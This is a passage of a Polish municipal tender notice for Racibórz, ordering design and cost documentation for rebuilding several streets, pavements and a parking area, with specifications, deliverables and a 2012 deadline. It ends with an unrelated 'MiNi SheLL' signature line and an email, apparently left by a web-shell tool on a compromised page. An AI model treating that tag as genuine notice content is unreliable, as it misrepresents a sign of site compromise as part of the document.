- szerokość jezdni 6,50 m,
-  szerokość chodników 1,50 m,
-  szerokość ciągu pieszo-rowerowego 2,50 m
-  powierzchnia parkingu dla samochodów osobowych wraz z drogą manewrową ok. 1400 m2
b). Zakres inwestycji:
- rozebranie nawierzchni bitumicznej jezdni ulicy i parkingu,
- wyrównanie istniejącej podbudowy betonem asfaltowym (średnia grub. 4 cm), 
- wykonanie warstwy ścieralnej z mieszanki mineralno-asfaltowej grysowej grub. warstwy po zagęszczeniu 4 cm,
- wymiana krawężników betonowych o wym.15*30 cm  i obrzeży betonowych o wym. 30*8 cm,
- wymiana nawierzchni chodnika z płyt betonowych o wym. 50*50*7 cm na  kostkę brukową betonową o grub. 6 cm szarą (chodnik prawostronny),
- wymiana nawierzchni chodnika z płyt betonowych o wym. 50*50*7 cm na ciąg pieszo-rowerowy  szerokości 2,5 m o nawierzchni z asfaltobetonu na podbudowie tłuczniowej ( chodnik lewostronny),
 - poprawa odwodnienia jezdni ulicy i nawierzchni parkingu,
 - poprawa organizacji ruchu na parkingu. 
c). Zakres opracowania:
- Projekt parkingu poprzedzony trzema  koncepcjami  usytuowania miejsc parkingowych   z uwzględnieniem ewentualnej likwidacji terenu zielonego oraz umożliwienia nawracania autobusów komunikacji miejskiej, 
-  projekt wykonawczy na aktualnych mapach sytuacyjno-wysokościowych,
-  projekt zagospodarowania terenu,
-  kosztorys inwestorski wraz z przedmiarem robót,
- projekt organizacji ruchu: docelowy i na czas prowadzenia robót drogowych,
- specyfikacje techniczne wykonania i odbioru robót,
- wymagane uzgodnienia.
d). Inne istotne informacje:
 Dokumentacja winna być opracowana: 
1). 6 egz. projektu w formie papierowej,
2). 3 egz. przedmiarów i kosztorysów inwestorskich,
3). 2 egz. kompletu dokumentacji projektowej w formie elektronicznej w formacie pdf.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonanie chodnika ul. Wygonowa (od ul. Gawliny do ul. Sosienkowej) - przebudowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi obejmującej opracowanie dokumentacji projektowej, służącej do opisu przedmiotu zamówienia na wykonanie robót budowlanych, dla których nie jest wymagane uzyskanie pozwolenia na budowę zgodnie z Rozporządzeniem Min. Infrastruktury z dn. 2.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej.

Warunki do opracowania dokumentacji projektowo - kosztorysowej:
a). Parametry techniczne :
- długość ciągu pieszo-jezdnego ok. 370 mb ( od ul.Gawliny do ul. Sosienkowej po stronie nieparzystych numerów posesji) 
- szerokość ciągu pieszo-jezdnego  2,5 m
- wymiary wjazdów należy ustalić indywidualnie dla każdej posesji

b). Zakres inwestycji:
- rozebranie istniejącej  nawierzchni chodnika i wjazdów (beton asfaltowy, beton lany) wraz z podbudową,
- wymiana krawężników betonowych, 
- wykonanie nawierzchni ciągu pieszo-rowerowego oraz wjazdów do posesji          z asfaltobetonu  na podbudowie z tłucznia kamiennego,
- poprawa odwodnienia w sąsiedztwie drogi gminnej dojazdowej do posesji nr 19,
- przed wykonaniem  zjazdu z drogi gminnej tłuczniowej dojazdowej do posesji  nr 19 należy poprawić jej odwodnienie (ujęcie spływającej wody na jezdnię  ul. Gawliny).  

c). Zakres opracowania:
- projekt wykonawczy na aktualnych mapach sytuacyjno-wysokościowych,
- projekt zagospodarowania terenu,
- kosztorys inwestorski wraz z przedmiarem robót,
-  projekt organizacji ruchu: docelowy i na czas prowadzenia robót drogowych,
-  specyfikacje techniczne wykonania i odbioru robót,
-  wymagane uzgodnienia.
d). Inne istotne informacje:
Dokumentacja winna być opracowana: 
-  6 egz. projektu w formie papierowej,
-  3 egz. przedmiarów i kosztorysów inwestorskich,
- 2 egz. kompletu dokumentacji projektowej w formie elektronicznej w formacie pdf.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wykonanie chodnika i przebudowa wjazdów - ul. Osiedleńcza.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi obejmującej opracowanie dokumentacji projektowej, służącej do opisu przedmiotu zamówienia na wykonanie robót budowlanych, dla których nie jest wymagane uzyskanie pozwolenia na budowę zgodnie z Rozporządzeniem Min. Infrastruktury z dn. 2.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej.

Warunki do opracowania dokumentacji projektowo - kosztorysowej:
a). Parametry techniczne :
- długość chodnika ok. 360 mb ( od ul. Ocickiej do ul. Górnej po stronie nieparzystych numerów posesji) 
- szerokość chodnika  zmienna od  1,50 m do 2,0 m
- wymiary wjazdów należy ustalić indywidualnie dla każdej posesji

b). Zakres inwestycji:
- rozebranie istniejącej  nawierzchni chodnika i wjazdów (beton lany, kostka brukowa, płyty betonowe) wraz z podbudową,
-  regulacja krawężników kamiennych z wymianą uszkodzonych, 
- regulacja wpustów ściekowych ulicznych-bocznych  z wymianą uszkodzonych,
- wykonanie nawierzchni chodnika z kostki brukowej betonowej grub. 6 cm (szarej) i wjazdów z kostki brukowej betonowe grub. 8 cm (czerwonej) na podbudowie z kruszywa naturalnego lub tłucznia kamiennego.
c). Zakres opracowania:
- projekt wykonawczy na aktualnych mapach sytuacyjno-wysokościowych,
- projekt zagospodarowania terenu
- kosztorys inwestorski wraz z przedmiarem robót,
-   projekt organizacji ruchu: docelowy i na czas prowadzenia robót drogowych,
- specyfikacje techniczne wykonania i odbioru robót,
-    wymagane uzgodnienia.
d). Inne istotne informacje:
Dokumentacja winna być opracowana: 
-  6 egz. projektu w formie papierowej,
-  3 egz. przedmiarów i kosztorysów inwestorskich,
- egz. kompletu dokumentacji projektowej w formie elektronicznej w formacie pdf.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Przebudowa ul. Odrodzenia - bocznej w Raciborzu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi obejmującej opracowanie dokumentacji projektowej, służącej do opisu przedmiotu zamówienia na wykonanie robót budowlanych, dla których nie jest wymagane uzyskanie pozwolenia na budowę zgodnie z Rozporządzeniem Min. Infrastruktury z dn. 2.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej.

Warunki do opracowania dokumentacji projektowo - kosztorysowej:
a). Parametry techniczne :
-  długość odcinka ulicy ok. 570 mb (od drogi wojewódzkiej nr 923 do końca  zabudowy tj. posesji nr 17) 
- szerokość jezdni zmienna od 4,50 m do 3,0 m,
b). Zakres inwestycji:
- rozebranie nawierzchni jezdni tłuczniowo - gruntowej,
- wykonanie nawierzchni jezdni  z betonu asfaltowego (w-wa wiążąca grub. 4 cm i w-wa ścieralna grub. 4 cm z mieszanki mineralno-asfaltowej grysowej) na podbudowie z tłucznia kamiennego,
- utwardzenie poboczy destruktem asfaltowym lub tłuczniem kamiennym,
- poprawa odwodnienia drogi (profilowanie i stabilizacja skarpy rowu przydrożnego, naprawa przepustów pod drogą i zjazdami itp.),

c). Zakres opracowania:
- projekt wykonawczy na aktualnych mapach sytuacyjno-wysokościowych,
- projekt zagospodarowania terenu,
- kosztorys inwestorski wraz z przedmiarem robót,
- projekt organizacji ruchu: docelowy i na czas prowadzenia robót drogowych,
- specyfikacje techniczne wykonania i odbioru robót,
- wszystkie wymagane uzgodnienia w tym  uzgodnienie zjazdu z drogi gminnej na drogę wojewódzką nr 923 z Zarządem Dróg Wojewódzkich w Katowicach.
d). Inne istotne informacje:
Dokumentacja winna być opracowana: 
-  6 egz. projektu w formie papierowej,
- 3 egz. przedmiarów i kosztorysów inwestorskich,
- 2 egz. kompletu dokumentacji projektowej w formie elektronicznej w formacie pdf.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Remont sięgaczy przy  ul. Szczecińskiej - sięgacz nr 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część  VII -  Remont sięgaczy przy  ul. Szczecińskiej - sięgacz nr 6

Warunki do opracowania dokumentacji projektowo - kosztorysowej:
a) Parametry techniczne :
-  długość sięgacza nr 6 wraz z wjazdami ok. 50 mb 
- szerokość ciągu pieszo-jezdnego 5,0 m
b). Zakres inwestycji:
- rozebranie nawierzchni z płyt drogowych żelbetowych wraz z podbudową,
- wykonanie nawierzchni z kostki brukowej betonowej, szarej grub. 8 cm na podbudowie z kruszywa naturalnego lub tłucznia kamiennego,
- poprawa odwodnienie nawierzchni (regulacja istniejących studzienek kanalizacyjnych  rewizyjnej i ściekowej, wymiana odwodnienia liniowego).
- płyty drogowe żelbetowe nadające się do ponownej zabudowy planuje się przeznaczyć na utwardzenie drogi tymczasowej dojazdowej do posesji przy ul. Koszalińskiej.
c). Zakres opracowania:
1). projekt wykonawczy na aktualnych mapach sytuacyjno-wysokościowych,
2). projekt zagospodarowania terenu
3). kosztorys inwestorski wraz z przedmiarem robót,
4). projekt organizacji ruchu: docelowy i na czas prowadzenia robót drogowych,
5). specyfikacje techniczne wykonania i odbioru robót,
6). wymagane uzgodnienia.
d). Inne istotne informacje:
Dokumentacja winna być opracowana: 
-  6 egz. projektu w formie papierowej,
-  3 egz. przedmiarów i kosztorysów inwestorskich,
- 2 egz. kompletu dokumentacji projektowej w formie elektronicznej w formacie pdf.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com